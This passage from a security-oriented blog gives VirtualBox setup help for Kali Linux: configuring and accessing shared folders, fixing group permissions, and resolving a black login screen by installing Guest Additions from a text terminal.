The Folder Path option lets you select where on your base Operating System you want your folder to be. Folder Name allows you to give your folder a specific name when accessing it on your Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory. Do not tick this if you want to be able to modify your folders. Auto-mount ensures that the folder is mounted on your Virtual Machine once it boots. You want to enable this option. Mount Point specifies where on the Virtual Machine you want it to mount. If you leave this empty then it should default to the /media directory.

Accessing Kali Shared Folder

With the settings saved, boot your Virtual Machine and login to the Desktop Environment. Then launch your file manager or file explorer. On the left-hand side, you should see a Devices section containing your File System and your Shared Folder. If not then it could be that you haven’t installed your Virtual Box guest additions.

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. In order to resolve this issue, you need to add your user to the VirtualBox users group. This can be done by running the following command.

sudo adduser $USER vboxsf

You should now be able to access the shared folder. It is unlikely that you will need to reboot the machine but if the problem persists then reboot and try again.

Fixing VirtualBox Kali Linux Black Screen

Posted on January 11, 2025January 11, 2025 by haxez

Hello friends and welcome to haxez. So, you have run in to the VirtualBox Kali Linux Black Screen Bug? After all that effort spent downloading it and importing the appliance, you’re excited, you attempt to login in and… nothing. Just a black screen. How disappointing. Do you reinstall it? Give up? Or do you fix it and add that knowledge to your mind palace.

The Cause Of The Kali Linux Black Screen

The likely cause of this problem is due to the VirtualBox Guest Additions either not being installed or not being the correct version. Either way, we need to get them installed to rule this out as a problem.

Kali Linux Black Screen Kali Linux — Login — Kali Linux — Login

Grab A Shell

Start the Virtual Machine and wait for it to get to the login prompt. Before logging in press your right CTRL key (VirtualBox host key) and your F2 key. If you ever need to do this natively on Linux then it will be left CTRL, ALT and F2. This sends a signal to the operating system to spawn a virtual text only terminal or a TTY. To get back to the Desktop environment you need to press left CTRL and F8.

Kali Linux Black Screen Kali Linux — TTY Shell — Kali Linux — TTY Shell

Install The Guest Additions

Now login to the Operating System using your credentials. If it is a Kali Virtual Machine downloaded from their website then the credentials are likely either username: kali, password: kali or username: root, password: toor. Once you have logged in you need to instruct VirtualBox to mount the guest additions CD. From the menu, Devices > Insert Guest Additions CD Image.

Kali Linux Black Screen Mount The cdrom

In order to access the content of the Guest Additions CD, you first need to mount it. You could create a mountpoint manually or you could run the following command. As you can see, the command is mounting the device ‘cdrom’ (denoted by the ‘/dev/’ directory) to ‘/media/cdrom’ directory.

sudo mount /dev/cdrom /media/cdrom

Now, if you list out the contents of the ‘/media/cdrom’ directory you should see a file called VBoxLinuxAdditions.run.

Install The Guest Additions

In order to install the Guest Additions you need to run that VBoxLinuxAdditions.run file. To do this simply run the following command.

sudo /media/cdrom/VBoxLinuxAdditions.run

You may be prompted to press enter but wait for the process to complete and then reboot your system with the reboot command.

sudo reboot

Login In

Once the system has been rebooted, try logging in with your username and password. Hopefully you should now be presented with your desktop and are able to go about your hacking activities.

Other Suggestions For Kali Linux Black Screen

If for some reason that didn’t work then there are some other things you could try. One of the other common reasons for this error is due to the display settings. Although changing this has never resolved the problem for me, I thought it was worth a mention. In VirtualBox, head to the settings and then the display settings. Try toggling 3D acceleration and changing the amount of video memory. I’ve heard this has resolved the issue for other people but again I’ve never been able to resolve the problem this way.